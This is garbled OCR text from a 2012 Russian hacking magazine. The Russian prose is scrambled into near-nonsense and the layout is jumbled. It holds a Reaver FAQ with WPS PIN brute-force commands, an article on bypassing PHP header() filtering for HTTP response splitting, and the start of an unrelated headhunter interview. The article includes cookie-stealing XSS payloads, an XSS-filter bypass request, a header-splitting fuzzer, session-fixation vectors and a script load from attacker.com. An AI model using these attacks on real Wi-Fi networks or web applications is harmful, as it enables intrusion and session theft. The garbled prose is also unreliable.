по причине которого неграмотный определяются снятия

подобных блокировок . В качестве варюра­ Почему у меня далеко не работает спуфинг

унда предлагают проэксплуатировать опцию

a.l

МАС-адреса?

· --ignoгe-locks' alias скачать последнюю

Почему около плохом сигнале Reaveг

...

Возможно, твоя милость спуфишь МАС виртуально-

версию с

работает плохо, хотя бы оный но хакинг WEP

081

го интерфейса mопО, а сие делать

WP5.

проходит нормально?

малограмотный будет. Надо определять титул реального

n нормально взламывание

интерфейса, например, wlaпO .

WEP происходит путем повторной пересылки перехваченных

081

Это происходит потому, что такое? знак

r;t

для сезон встать вопреки дороги утилизация

0':'1 a.l

Почему ваш покорнейший слуга неизменно получаю ошибки

a.l

0VN.

mМожно ли вдруг не заботиться два и сильнее экземпляров Reaveг пользу кого ускорения

атаки?

n

Теоретически МОЖНО, НО когда ОНИ будут

жете кетов, дай тебе обрести значительнее векторов

Reaveг всё-таки миг посылает точке доступа

инициализации (IVI, необходимых на

сам в соответствии с себе да оный но

успешного взлома . В этом случае неважно,

Проверь, активирован ли получай раутере

скоростьперебораедвалиувеличится,таккак

потерялея какой-либо пакет, либо когда-то

WP5. Это

на данном случае возлюбленная ограничивается слабым

ПРОКАЧИВАЕМ В

PIN,

дозволительно совершить быть помощи ути-

вытверживать одну равно ту но точку доступа, ведь

REAVER

ты да я показали самый безыскуственный равным образом самый многосторонний

HOWTO

081

на нежели дело?

путь использования утилиты Reaveг. Однако проведение в жизнь

WP5 у

разных

0. Некоторые точки доступа

могут не допустить

WPS возьми

определенное

срок , заподозрив, что такое? их пытаются поиметь. Reaveг эту ситуацию замечает

производителей отличается, потому-то на некоторы х случаях необходима

равным образом делает паузу на переборе получи и распишись

дополнительная настройка. Ниже ваш покорный слуга приведу дополнительные опции,

паузы допускается менять:

015

секунд до умолчанию, продолжительность этой

которые могут нарастить прыть равным образом результативность перебора ключа.

# reaver -i

0. Можно распатронить комната

канала да

# reaver -i

00 : 01:02:03:04:05

0. mопВ

mопВ -Ь

00:01:02:03:04:05 --lock-delay=25B

0510 точки доступа: -с

01

-е liпksys

Некоторые реализации протокола

WPS

разрывают сцепление рядом

неправильном РIN-коде, ежели и до спецификации должны возвращать особое сообщение . Reaveг машинально распознает такую ситуацию, к сего

0.

Благотворно сказывается держи скорости брутфорса опция

·-- dh-small',

существует опция · --пасk' :

которая задает небольшое достоинство секретного ключа, тем самым облегчая

# reaver -i

выкладки получи и распишись стороне точки доступа:

# reaver -i

mопВ -Ь

00:01:02:03:04:05 -vv --dh-small

0. Опция

mопВ -Ь

00:01:02:03:04:05

--пасk

' --eap-teгmiпate' предназначена к работы от теми АР, которые

требуют завершения WРS-сессии из через сведения ЕАР

0. Таймаут ожидания

необходимости его позволительно изменить:

# reaver -i

# reaver -i

0. Возникновение

mопВ

FAIL:

ответа до умолчанию равен пяти секундам . При

00 : 01:02:03:04:05 -t 0

mопВ -Ь

00:01:02:03:04:05

--eap-termiпate

ошибок во WР5-сессии может означать, сколько АР

ограничивает количество попыток ввода РIN-кода, либо просто-напросто перегружена

0. Задержка

в среде попытками соответственно умолчанию равна одной секунде. Она

# reaver -i

ХАКЕР

mопВ -Ь

03 /158/ 00 02

00:01:02:03:04:05 -d

запросами . В этом случае Reaveг приостанавливает свою деятельность,

вдобавок сезон паузы может существовать задано со через опции

т акже может бытийствовать настроена: В

# reaver -i

mопВ -Ь

·--fail-wait':

00:01:02:03:04:05 --fail-wait=360

023


COVERSTORY &lt;script&gt;alert(&quot;Recognize-Security &quot; +document .cookie ); &lt;/script&gt;&lt; !-- "></ head ><body></body></html >

DISCLAIMER

Вообще, на п роцессе аудита первично г по отношению стих веб-приложений

для РНР неоднократно попадаются конструкции вида

header( "Location: " .$_GET[ 'backto_url' ]) сиречь аж header( "Location: / index. php?lang=".$_G ET[ 'lang' ]). Е сли первую до этих пор не возбраняется классифициро­

ZeгoNights, а только что написана по части его мотивам. Помимо материала,

вать пускай бы бы что уяз вимость класса О реп R ediгect, ведь вторая небось

дальнейших исследований, посвященных филырации РНР­

бы общий неграмотный является уязвимостью . Опытный пользователь заметит,

функций равно механизмам работы браузеров не без;

чт относительно после этого во явном виде во вкусе присест таки да присутствует ба г будто НТТР

доклада, касающаяся уязви мастей, связанных вместе с заражением

Response Sp li tti ng, %0 d%0a

изложенного умереть и никак не встать пора доклада, во статью в свой черед вошло оnисание .

cookies. Часть

кеш а, равно smuggling-aтaк, хорэ изложена на расширенном виде

н насчёт всё обязанности на том, ч т в отношении современные версии

интерпретатора РНР [начиная не без; 0006-го года] фильтруют раздели­ тели

Эта артикул далеко не является копией мой доклада бери конференции

на следующих выпусках журнала.

равно препятствуют проведению атаки. Вот сие равно очищать та

самая практическая предпосылка, которая заставила меня пофигачить

углубленное рекогносцировка данной темы. Поэтом у предлагаю безграмотный доверять

эти РНР

первому впечатлению по отношению фильтрации во функции headeг[] равно разо­

которая предотвращает интрузия заголовков равным образом защищает с атак

приступать из проблемой глубже, ведь, присутствовать может, т акую фильтрацию

как «расщепление ответа>>. Таким образом, начиная вместе с во ерсии РНР

0.4.2

позволяется обойти.

да

0.4.2

0.1.2,

равно

0.1.2

во этой функции осуществляется фильтрация,

затащенный вверху адрес н е является уязвимым для того атак

будто <<в недр ение заголовков>> равным образом <<расщепление ответа>>:

ПРОТОКОЛ НТТР Обратимся для переаисточнику [спецификации протокола НТТР] , что­ бы понять, какие символы могут предназначаться разделителями заголов­

засада НТТР- ответа. П олный подтекстовка спецификации доступен объединение адресу

Ьit .l y/ г9pLL , нас а интересует раздел

0 - Re sponse

c ?php header( "Location : / basic/ " .$_GET[ 'redirect ' ] . ".html" ); ?>

[ Ьi t .ly/BEAq4 ].

Общая схема НТТР- ответа имеет нижеперечисленный лик :

В результате попытки проведения таких атак хорошенького понемножку вызвана ошибка вроде Waгniпg, приблизительно такая:

RFC-2616 Response=Status-Line; Section 0.1 * (( general-header; Section 0.5 1 response-header; Section 0.2 1 entity-header ) CRLF); Section 0.1 CRLF [ message-body ]; Section 0.2

Документация

test.php?xxx=bbb%0a%0dNew-Header:ЫaЬla

Warning: Header may not contain more than а single header, new line detected. in test.php оп line 0 Н по отношению нуте неграмотный будем махом навешивать ярлыки, а разберемся в проблеме незначительно глубже. Рассмотрим адрес интерпретатора, тот или иной

Из приведенной сверх информации ясно, почто разделителем заголо вк ов является вывод

CRLF,

пользуется в целях в отношении тд еления тела отве т а об т блока заголовков . В кодированном виде

CR LF

выглядит по образу

выполняет фильтрацию разделителя :

которая в свою очередь ис­

%0 D%0A.

URL-

Именно во таком

виде симпатия равно используется с целью проведения классических атак подобно

«рас щепление запроса». Эти методы важнецки работали прежде тех пор, пока интерпретаторы малограмотный обзавелись функциями фильтрации

CRLF,

/* new line safety check */ char *s=header_line, * е=header_line + header_line_ len, * р; while (s < е && (р memchr(s, ' \n' , (е - s)))) { i f ( *(р + 0 )== ' 01 *( р + 0 )=='\t ' ) {

по части ко т орых в ту же минуту равно пойдет речь.

0=

р

+ 0;

continue ; ФИЛЬТРАЦИЯ РАЗДЕЛИТЕЛЯ

CRLF

В РНР

Ф ункци автор этих строк headeг[] [ Ьit .l y/wVbbcd ] хорошо используется во РНР ради

efree(header_line ); sapi_module.sapi_error(E_WARNING, "Header may not contain more than а single header, new line detected. "); return FAILURE;

передачи заголовков на НТТР -ответе сервера. Чаще просто-напросто ее при­

меняют к переадресации пользователей не без; одной страницы веб­ приложения получи и распишись другую. Как будто с документации, начиная не без; во ер-

Browser Single

Second Content-Length header

data

header

schema

splltter byte

ln Refresh header

Как видно, тогда осуществляе т ся осмотр получи наличность символа

LF

[в URL-кодированном виде выглядит в качестве кого % Од] . Пр равным образом обнаруже­

нии такого символа, со временем которого игра стоит свеч отчего-то вдобавок табуля-

ции

[%09]

равно пр обела

фильтруется н е

[%20], вызывается ошибка. Таким образом, CRLF, а лишь LF-байт. Согласно RFC , какой автор

как-то изучили, всё работае т безопасно. Н по отношению предл а гаю никак не сда­ ваться где-то аллегро равным образом разведать у браузеров, соблюдаю т ли они

RFC

на точности? П ервым делом допускается проверить, во вкусе браузеры воспри­ нимают название вместе с первым пробелом равно табуляцией. Для сего на­ пишем прос т ой РНР-скрипт да проверим его по-под во семи браузерам равным образом :

Таблица тестирования браузеров бери индивидуальный разделитель, бигеминальный заrоловок длины и Refresh-зaroлoвoк

026

c?p hp header( "X-Test1:1 \ r \ n Set-cookie: is1=0K " ); header( "X -Test2 : 0\ r \ n\ tSet-cookie : is2=0K" ); echo "cscript >alert(document.cookie) </ script >" ; ?>

ХАКЕР

03/158/2012


Расщепляй равным образом властвуй

П олучается, исключительно lпtегпеt Е хрlогег понимае т куки на таких хидерах. Таким образом, всего-навсего прочитав

RFC

да просмо т хныканье

исходник да РН Р равным образом три строки т естово г относительно кода, ты да я сделано выяс н или, вроде

огибать филырацию функции headeг[J интересах

IE, равным образом значительно рас­

ширили район применения большинства уязвимостей, которые

~

*

0

Веб

localhost:8080/php·smug/index2.php

Warning: Header may not contain more than \indexl.pbp on line 0

а

single header, oe\v line detected. in

'1

попервоначалу классифи ц иро во алис ь т в отношении л ько вроде О реп Rediгect. Н в рассуждении небу­ дем стать получи дости г нутом равно двинемся дальше. Впереди другие браузеf)Ы да новые идеи.

Работа фильтра функции headeгll на РНР из 0006 годы вызываетта кую ошиб для у

+ Д а, ч т ение конец н ых кодов РНР равным образом рассуж д ение из точки зрения

здравой логики сейчас дало со на ои п ло д ы. Мы нашли сnособ внедрения заголовков к браузера lпteгnet Е хрlогег. Пре д лагаю невыгодный останав­

*0

~

Веб

localhost8080/ php·smug/index2.php

Warning : Cookie names can not contain any ofthe foJlo,ving '=,; \t\r\n\013\014' in \indexl.pbp on line 0

'1

ливаться держи достиг н у т ом равно n р насчёт д олжить начатое исс л едование, что­

бы попытаться доби т ься того но равно чтобы д ругих браузеров.

Итак, исходники Р Н Р будто бы в отношении филырации % 0а [\nили LFI.

Рабо та ф равным образом льтр а фун для ци да setcookiell соответственно первому аргумен ту

Предnоложим, почто сущес т вую т какие-то бай т ы, которые могут ~

служи т ь однова д елителями заго л овков с целью браузеров. Д л ваш покорнейший слуга nроверки этого предположения напишем азбучный фаззер равно запустим его подина

различными браузерам и. Н аиболее важные куски заключение фаззера

*0

nри на е д ены подальше :

'1

#! / usr / bin / perl use str i ct ; use warni ng s; use Socket ;

Веб

loca lhost8080/ php·smug/ index2.php

Warning: Cookie values can not contain any ofthe foJlowing ',; \t\r\n\013\0 04' in \indexl.pbp on line 0

Работа фильтр а функци равным образом setcookiell согласно второму аргументу

н улл-байт. Информацию об этой уязвимости автор отправил произво­

дителю. Ей был присвое н закидон 05992 да высота черта Low [это не позволило ми произвести мзда после ее обнаружение,

listen SERVER , 0е ; $an sw="НТТР/1.1 0ее OK\r\n" ; for ($ i=e ; $i <256;$i++ ){ $an sw.="Set-cookie: cook-$i=1" .c hr($i);

что, на общем, объективно - сие во всяком случае живей ба г, нежели уязвимость!.

ту

В итоге на 05-й версии Хрома нул л-байт ранее поправи л и, а ко моме нт у выхода этой статьи, подозреваю, актуальной довольно поуже 07-я версия бра у зера. F i гefox но остается для высоте, nоскольку реализован в этой части ровным счетом так, по образу описано во

$answ .="\r\n\r\n<h1>Test splitting bytes</h1>" ;

RFC. Следовательно,

ни единолично

с найденных нами способов обхода филыров Р Н Р в целях него рабо­ тать малограмотный будет. Фаззер куда простой: от его через автор сих строк выясняем, может

ли какой-т касательно единовластно байт [под ч ерки на аю, не кто иной единый байт,

РАСЩЕПЛЯЕМ ОТВЕТ И ПРОВОДИМ

XSS

а никак не д ублет! служит ь раздели т елем заголовков на браузерах, наравне

Настало пора выехать найденными во фильтре ошибка­

CR LF [%0d%Dal. Д ля э т касательно г насчёт получи сокетах nишем веб - микросервер,

ми равным образом nроэксnлуатировать уязвимости функции headeг[J, ведь убирать

ко т орый получи какой приглянется НТТ Р-за п рос браузера дает в отношении т вет, со д ержащий

проложить безграмотный посредственную атаку. Здесь преддверие нами встает

х идеры

Set-cookie,

разделенные каждым с

056

байт объединение очереди.

Соот на етственно, разве какой-то байт срабатывает как бы разделитель,

новая трудность - самочки браузеры имеют вделанный механизм защиты с расщепления ответа . Вот в качестве кого мудрено по сути дела

поя на ляетс ваш покорнейший слуга свежеиспеченный кукис, ежели а неграмотный срабатывает, так для значению

когда-когда пить кровь от l iепt - sidе-уязвимости: сперва борешь­

текущего кукисадописывается строчечка ви д а

ся из фильтрами получай серверной стороне, а попозже бьешься сызнова равным образом со

<«N>Set-cookie :.. >> . За­

пускаем скрипт, заходим вместе с через браузера, считаем количество проставленн ы х куки, смотрим, какие байты от р аботали, по времени nро ­

клиентскими.

Итак, фосфоролиз отве т а глав н ым образом основано получи и распишись пере­

буем нижеуказанный браузер. П роцедура безвыгодный аспидски у т омительная, приблизительно

даче ложного заголовка Content-Leпgth, кой вынужден бредить

по образу интересах тестов я берем всего самые популярные браузеры, кото­

браузеру, насколько байтов содержится на теле НТТР-ответа. Однако

рых только п аз многогрешный т ь

:-1. Тем

безграмотный менее, рекоме нд ую т ебе самос т оятельно

п ри вызове headeг[J лично Р НР отправляет по части д ан текстовка Coпtent­

изменять фаззер ежели и бы для того автоматизации подсчета куки

Leпgth со значением О, с сего никуда далеко не деться. Таким образом,

равным образом поиска разделителей [исходники фаззера ищи сверху нашем диске!.

лучший НТТР Response Splitting [расщеnление НТТР-ответаl

Получаются вона такие равно н тересные резул ьтаты:

работает лишь только тогда, эпизодически браузеры воспринимаю т следующий за­ головок

Content-Length

в духе воистину верный. Здесь да начинаются

проблемы, затем что ни одинокий новый браузер этак далеко не де­

0/9 %ed Fi r efo x 0 Oper a %ed Chrome %ed %ее ( Is s ue 05992 fi xed i n re l . 05) Safa r i %ed н

лает. Тем безграмотный менее, позволяется nровести атаку для того lnteгnet Е хрlогег, воспользовавшись т ем, что-нибудь нынешний браузер расnознает Н Т МL-код на от­ вете, пусть даже безграмотный читая хидер

Content-Length.

Это больше нежели странное

nоведение имеет площадь во браузере от 0-й по мнению 0 - ю версию . П ишем уязвимый Р НР -сценарий:

Как видно, всегда браузеры, не считая F iгefox, воспринимают оди­ ночный

CR

т очно таково же, что равно всю постоянство

CR LF.

Вот э т относительно уж настоя щ ий резул ьтат, полезно д аря ко т орому можно н е всего лишь шея на равным образом т ь уязвимость, же да выработать атаки в ее основе

<?php header( "X-Header: aaa" .$_GET ( 'r' ] ); ?>

фундаментально кросс-браузернымиl Отмечу, что, эпизодически пишущий эти строки начинал эти с ы ска н ия, ак т уальной была 04-я вариант

Goog le C h гome,

дл мы

для оторой в свой черед существовал противоположный байт-разделитеть -

Х АКЕР ОЗ/15 0/ 0 01 0

Затем n рово д им атаку nод l nteгnet Е хрlогег посре д ством вот такого НТ ТР -заnроса :

027


COVERSTORY обсудили. Еще одиночный IЕ'шный заголовок, X-Content-Type-Options, ·

/index.php?r=foobar%ed<html>%ed<hl> TEST </h l >

предоставляю тебе рассмотреть самостоятельно. Остальные заголов ­ ки на управления безопасностью поддерживаются всеми браузе­

Вывод сего из часовня твоя милость сможешь различить получи соответствую­

щем скриншоте. На первоначальный взгляд, всё ранее хорошо. Однако нас

рам равно . Однако запомни по образу аксиому следующее утверждение: заго ­

ловки перезаписываются [за исключением Content-Length). Таким

блокирует замонтированный во браузер ХSS-фильтр, в отдельных случаях автор пробуем

образом, header( "Location:

ввести воттакой план :

дает полноценную чувствительность Open Rediгect присутствие эксплуатации

/index .php?r=foobar%ed<html>%ed<script > alert(/Splitting/)</script>

хотите- верьте, хотите- проверьте. Сейчас ваш покорнейший слуга малограмотный буду nеречислять

/index.php?lang=" .$_GET[ 'lang' ])

вектора ?lang=aaa % 0dlocation:http://yandex.гu. Как говорится, все возможные заголовки lпрочитать по части них твоя милость сможешь нате соответ­ ствующей врезке), а остановлюсь всего лишь возьми самых значимых. Итак, Access-Contгoi-AIIow-Oгigin- сие из-за шайба овок, кто

Пройти экий линия да малограмотный унаследовать желаемого результата, упер­ шись на какой-то с годами фильтр,- сие неграмотный на нас. Вспоминаем, который автор

работает nочти nод всеми браузерам и, не считая Орега, на фолиант числе

можем далеко не всего лишь приводить веточка ответа сервера, хотя равным образом насаждать

лещадь lnteгnet Ехрlогег 0+, Fiгefox 0.5+, Safaгi 0+ равно Google Chгome. Для

заголовки. К тому но ХSS - фильтр lпtегпеt Ехрlогег, вопреки получи в таком случае

азы советую познакомиться со первоисточником lmzl.la/4sгnwml.

который некто усиленно прибавил во сигнатурах за сравнению вместе с 0-й версией

Как видно, оный фонарик допускается пустить в дело со дополнительными

браузера, всё в такой мере же, что равно раньше, отключается из через специ­

после очко касательно во ка ми Access-Contгoi-AIIow- Methods,

ального заголовка X-XSS-Pгotectioп: О. Ну вот, свежий кусочек пазла встал возьми место, равно в настоящий момент не возбраняется сопровождать полноценную

Headeгs, Access-Contгoi-Max-Age да некоторыми другими [снова обрати заинтересованность получи приведенную ранее ссылку ). Назн аче ни е сих

атаку.

заголовков, думаю, несомненно изо их названий. Access-Contгoi - AIIow­

Финальный НТТР-запрос ко уязвимому сценарию имеет следую­

Access - Contгoi-AIIow­

Oгigin дозволяется исnользовать в качестве кого интересах усиления, приближенно равно на ослабления безоnасности . Всё деятельность во том, который разве настоящий аншлаг невыгодный содер ­

щий вид:

жится на ответе, пришедшем через сервера, в таком случае приступ посредством XHR ко со­

/index2 .php?r=foobar%edx-xss-Protection:e%ed<html>%ed <script >a lert( /xss/)</script>

держимому тела такого ответа запрещен. Таким образом, ты да я можем внедрить наименование «Access-Contгoi-AI I ow-O гigin : •" равным образом nрочитать полный отчёт со всеми конфиденциальными д анными.

ЧЕРЕЗ ТЕРНИИ К ЗВЕЗДАМ Мы начали не без; чтения RFC, спустя время заглянули в середку РНР, в дальнейшем плав­

ОСМАТРИВАЕМСЯ

а перешли для изучению механизмов, применяемых браузерам равным образом пользу кого

Итак, я нашли определенные уязвимости функции headeгll. На­

обработки ответа, равным образом вот, наконец, получили важные результаты.

стало быть сезон узнать, существуют ли какие-нибудь часть функции,

Мы разобрались со lntегпег Е хрlогег равным образом рассмотрели ввод за­

выnолняющие аналогичную фильтрацию. Собственно, на РНР име­

головков во НТТР -о тв ет. Сам рецепт безграмотный является частным случаем

ется лишь три функции, которые занимаются касательно тправ какой заголов­

расщепления ответа, таково что быть его использовании появляется

ков: headeгll, setcookiell да setгawcookiell. В результате недолгого

токмо сверхштатный заголовок, а неграмотный вторичное клейстокарпий ответа. А если бы пишущий сии строки

изучения легко и просто выясняется, аюшки? двум последние функции, беспричинно а

безграмотный внедряем органон ответа, в таком случае равно проблем со Conteпt-Length у нас равно как

наравне равным образом headeгll, уязвимы во аргументах $path равно $domain . Уязвимые

отнюдь не будет, ведь, как один RFC, запись НТТР ни почти каким видом неграмотный регулирует

доводы есть, однако их разновидность пользователем во Приложениях

часть заголовков . Теn ерь предлагаю nойти после этого равным образом nристу­

встречаетс автор этих строк хватит редко. Обычно через nользовательских nара­

зеленого змия ко изучению др угих потенциально внедряемых заголовков, тем

метров зависит только лишь название либо — либо зна чени е куки, а ни за что безвыгодный владение

больше что такое? я вновь безграмотный выяснили, на правах коротать атаку перед остальны­

равно далеко не колея . Поэтому обследование подобает удлинить . В имени и значениикукивыполняется несравнимо сильнее строгая фильтрация,

ми браузерам и.

нежели во функции headeгll:

ВНЕДРЯЕМ ЗАГОЛОВКИ Как уж было отмече н в отношении выше, заголовки неграмотный влияют возьми Content-

Length, а значи т, их дозволяется ввести на НТТР- отрицание чтобы любых браузеров. В нынешнее миг существует н емало заголовков для управления безопасностью, сам сообразно себе с которых, X-XSS-Pгotection, управляющий встроенным ХSS-фильтром l nteгnet Ехрlогег, пишущий сии строки еще

i f (name && strpbrk(name, "=,; \t\r\n\el3\el4" ) !=NULL) { !* man isspace for \ еlЗ and \ el4 */ zeпd_error( E_WARNING, "Cookie names сопение not coпtain any of the followiпg'=,; \\t\\r\\n\\el3\\el4' " );

ЗАГОЛОВКИ УПРАВЛЕНИЯ БЕЗОПАСНОСТЬЮ 1. X-Frame-Options. Содержит перечень доменов,

Coпteпt-Security-Policy : allow http://*:80.

идентификатор сессии, а по прошествии времени просто-напросто

со которых заданный сайт может фигурировать загружен

З.

подождать, нонче юзер авторизуется,

во ifгаmе/fгаmе-контейнер . Для проведения атаки позволяется утилизировать X-Frame-Optioпs : allow-fгom

attacker. 2. X-Content-Security-Policy.

Refresh . Старый благой Refгesh . Дает внедрение HTML около использовании dаtа­ схемы либо — либо Open-гedirect : Refresh : 0,data:text/ html,<h1>0K</h1>. В таком содержимом Chгome

да пустить в ход текущий маргиналий пользу кого вторичной

аутентификации. Вектор может выглядеть примерно следующим образом: foobaг :% 0d5et­

наличность доменов, из которых разрешено

план выполняется неграмотный во целевом домене ,

Cо относительно k i е: Р Н Р5 Е 051 D=FA К Е D%0d Locat ion=/ auth.php. Разумеется, такая элемент короче

нагрузка содержимого . Скажем, ежели сервер

а во праздник самой data-c x eмe, ась? безвыгодный позволяет

делать исключительно во волюм случае, если бы веб­

устанавливает во ответе X-Content-Secuгity­

злоумышленнику обитать

адденда за авторизации невыгодный отправляет

Policy : allow 'self', в таком случае шифр <script src="http://at-

0. Set-cookie. Его автор привожу после этого

tackeг.com/1.js"><scгipt> коптеть в странице

как никогда ради полноты. Используя

На практике

безграмотный будет. Таким образом, на значении чтобы

оный заголовок, позволено поставить заблаговременно

для того 0ession Fixatioп !именно где-то называется

проведения атаки никуда не денешься указывать Х-

в готовности lто очищать именитый злоумышленнику!

каста атака!.

028

Содержит

фильтрует scгipt . Но, наравне бы со временем ни было,

XSS.

пользователю свежеиспеченный идентификатор сессии .

09% РНР-приложений уязвимы

ХАКЕР

03/158/2012


Расщепляй равным образом властвуй

01[~ .tf] http://t~stcom:8080/php·smug/i ndexl.php?rsfoobar%0d <html > %0 Р

х

Find: j9

0

Conten t-Lenиth:

PI'N~ous Nежт.

0

0

..

С, Х ' ~ testcom

Options .. 0

0 Keep-Alive: timc:ou\-5, max"" IOO Connecrion: Keep-Ative Content-Type: textlhtml

TEST Content·Lengtb: 0 Keep-Alive: timeout=5, ma:-;;=1 00 Connectioп : Keep-Alive Content-Typc: textlhtml

IE распознает НТМL-содержимое даже если

до Coпteпt-Length, в таком случае очищать лично во заголовках

return FAILURE ; }

if ( !u rl_encode && value && strpbrk(value, ",; \t\r\n\013\814" ) !=NULL) { /* man isspace for \ 013 and \ 014 */ zend_error( E_WARNING, "Cookie values сопение not contain any of the following',; \\t\\r\\n\\813\\814'" ); return FAILURE;

0 lnternet

Eжplorer has mod ified this page to Mlp prevent cross·site кripting.

Срабатывание ХSS-фильтра во

IE

chrome 0896 safari 0891-LEN(cookie_name) opera 0896 firefox 0896 iexplore 0116- LEN (cookie_name) ПЕРЕЗАПИСЬ КУКИ ПРИ ПЕРЕПОЛНЕНИИ ЧИСЛА Как всегда, кризис миновал вчинить вместе с чтения

RFC: www.ietf.oгg/гfc!rfc2109.txt . RFC надлежит устремить нате фразу << at least 20 cookies рег unique host ог domain name». Здесь безграмотный говорится четко, должно ли браузерам охранять 00 кукинахост или — или 00 Особое почтение на этом

} Функция stгpbгkll возвращает ложь, если бы на первом аргументе присутствует несмотря на то бы нераздельно байт изо второго аргумента. Как видно,

куки получай домен. Пусть самочки решают. Видимо, во 0997 - м г оду сие

просачивание именикукиотличается через фильтрации значения всего лишь

казалось нормальным, однако сейчас, когда-когда существую т уроды

одним байтом- символом равенства. Прежде лишь ми захотелось

вместе с сотней поддоменов, настоящий проблема побольше нежели актуале н.

проконтролировать функцию фильтрации. Она является полным аналогом

Итак, когда-никогда ваш покорнейший слуга прочитал таковой

RFC,

так принялся высматривать настройки,

!вернее, прототипом] РНР'шной stгpbгk l php.su/fuпctioпs/?stгpbrk ] ,

определяющие максимальное число ко у ки на брауэерах, равно про­

которая оказалась небинарно совместимой . Казалось, зто победа,

верять, распространяются ли сии настройки получи и распишись nоддомены . Вот сколько

же никак не тут-то было! Дело на том, что такое? самочки встроенная на РНР круг обязанностей

половая принадлежность у чилось:

передачи ответа через сервера такженебинарно совместима, ведь убирать

нулл-байт обрывает со тр оку равно как крата на книга месте, идеже наша сестра могли бы провести имплантация заголовка сиречь тела отве т а. В итоге канделябр у зер получает сейчас укороченную сообразно нулл-байту строку. Дальше был фаззинг, бессчётно фаззинга . И никаких идей относительно том, в качестве кого пройти

фильтрацию, и так на старых версиях РНР символ=не обрезается.

Новые версии безвыгодный содержатуязвимости lя проверил их совершенно со

chrome 088 safari -2888/ LEN (cookie_na me+cookie_va l) opera 08 firefox 049 iexplore 09

0010

возраст ] .

Как видно, сии значения неграмотный равны

00,

однако все же суще­

ственно не в экой мере 00000 :-].Что касается поддоменов, в таком случае точки соприкосновения

ОСОБЕННОСТИ

COOKIES

числокукисохраняется лишь ради Орега равным образом Chгome, прочие

Фаззин г ввек дает какой-то результат, нехай аж никак не нимало тот,

ведут отсчеткукиотдельно про каждого поддомена . Ситуация

получай некоторый рассчитываешь изначально. Эксперименты не без; фильтра­

забавная, благодаря чего который допускается сверзить куки вышестоящего домена

цией в недрах первых двух аргументов setcookiell равным образом setгawc o okiell

от нижнего уровня . А не возбраняется ... Можно пронюхать имена куки выше­

как и принесли домашние плоды. Я выяснил забавные особенности об­

стоящего домена. РоС сего ба га для того О ре га равно Chгome фактиче­

работки куки во браузерах равным образом хочу загнать об сих особенностях

ски представляет на лицо всеобъемлющий скоуп в отношении гр аниченного числа куки.

на не без; т атье. Ведь уязвимости вторичны по мнению сравнению от теми метода­

Что будет, если от дальше от тоящего домена придет IN+1]-й кукис?

ми, из через которых они были найдены. Как гласит китайская

Он перезапишет како й -токукис изо скоупа. Правильно, а ка-

народная мудрость, отдашь свою рыбу- накормишь товарища

кой? Самый старый? Нет, на книга да около кол, почто спирт выберет кукис

получи день, научишь его стараться поймать рыбу- накормишь получи и распишись всю живот .

соответственно абевега у . Пахнет бинарным поиском? Да, то есть так! С по­

Но хва т ит лирики, перейдем из рук в руки для результатам.

мощью этой привереды ты да я можем подыскивать именакукивышестоящего домена со нижестоящего подина Орега да Chгomel Н по части писат ь ко д перед

БЛОКИРУЮЩАЯ ДЛИНА ЗНАЧЕНИЯ КУКИ

эту задачу плохо равным образом никак не особенно нужно, во всяком случае на реальной жизни

Если во качестве значения кукису делегировать лишше символов, нежели

значения куки куда как важнее, нежели их имена, которые, в качестве кого правило,

поддерживает браузер, кукисне проставится. Я воспользовался

являются статическими. Итак, подведу итог. Оказывается, мож­

этой особенностью, если ми получи и распишись практике должен было до­

да снимать куки, разве принимать случай вписать бесчисленно

воевать того, так чтобы такого типа смотри шифр далеко не ставил куки :

своих. Иногда чтобы одного домена, кое-когда вдобавок ради п оддоменов

ICh гome, Орегаl.

<? php setcookie( "param8" , "PREFIX_" .$_GE T[ 'p8' ]);

leilii;Jel В постлюдия статьи автор бы хотел мобилизовать тебя nродолжить мое

?>

анализ да пофигарить свое, паче современное равным образом интересное.

Для решения этой задачи надобно

0096

символов . Предпо­

Надеюсь, ми посчастливилось парировать отнюдь не всего только секрет различных ба го во

лагается, почто лишняя апофема обрежется. Однако ни чуточки до сей времени

подобно НТТР

браузер ы не вдаваясь в подробности невыгодный ставя т такие кукисыl Следовательно, неравно

ку да изучению. А разве нет- обещаю выискать минута равно си лы , дабы

кукис ранее существует, симпатия далеко не п ерезапишется. Это порядок помогло близ

писать новые статьи в целях журнала. На совершенно воnросы

написании сплойта около ранимость будто Sessioп Fixatioп. Вот такие

равным образом безвыгодный только лишь вместе с радостью отвечу во своем благе i oxod . гu ]. Сnасибо

цифирь блокирующей длины значениякукиполучаются по-под

вслед за уважение равно накануне новых встречl :Х:

Response Splitting,

однако да разрисовать лично путь для их п оис­

no

от т атье

разными браузерам и:

ХАКЕР

03/1 08/20 02

029


COVERSTORY

&ИОГРАФИЯ Окончиnафакультет

журналистики МГУ.

Работала редактором 01 главным редактором во раэnичных иэданиях. Участвовала на соэдании портаnа гabota.ru, вэявwего nремию Рунета.

запустила чертеж PaбoтalaMa\\.Ru. Зкс-хантер Ma\\.Ru Gгoup.

Основатель агентства интернет­ рекрутмига PRUFFI. один иэ ведущих экспертов рынка хантинга на рунете.


Интервью из вед ущим хедх антером рунета

ИНТЕРВЬЮ С ВЕДУЩИМ

АЛЕНА ВЛАДИ М И РСКАЯ

ХЕДХАНТЕРОМ РУНЕТА

О РАБОТЕ ХАНТЕРА

fгiends). Каждый с нас является носи­

Многие воспринимают хедхантеров вроде раз­

вплоть до

0,5

миллионов рублей на месяц.

телем информации касательно тех людях, из кото­

датчиков пища на блокадном Ленинграде. Все

рыми работает. Именно вы, а никак не правитель тер

Раз на дим автор сих строк делаем близкие обзоры,

думают, что-то даже если ладить не без; нами да узнавать вол­

сnособны nравильно дать оценку сих

идеже ставим реальные зарплаты (pгuffi.

шебный телефончик ведущего хантера на рунете,

людей. Вы работаете не без; ними любой

гu/analitika) . Цифры , которые ты да я nри­

в таком случае зто наравне дополн да т ельная доля ка хлеба. Ты зна­

дата равным образом безошибочно можете сказать, кто именно лакомиться

водим, держи

ешь продавщицу, да возлюбленная видать в качестве кого может принести

кто: смотри этому товарищу заключая ни аза

тике с известных рекрутинговых nро­

тебе внеочередной сухарик . Н касательно нате самом

запрещается nоручать, а во оный положительно

ектов. Почему? Объясню получи nримере .

деле никак не может. Боле е того, кайфовый промежуток времени блокады

отлогий чувак.

00-40%

Мы знаем, сколько nрограм­

из-за зто расстреливали . Знание сего волшебного

телефона, в соответствии с сути, ни плошки далеко не дает.

мист получи

Хантер заурядно знает Но подавляющая технических

Буквально внове у меня три дня малограмотный работала

сnециалистов - людишки неnублич-

чинающий , круглым счетом как бы безотлагательно сие

счел меня каким-то

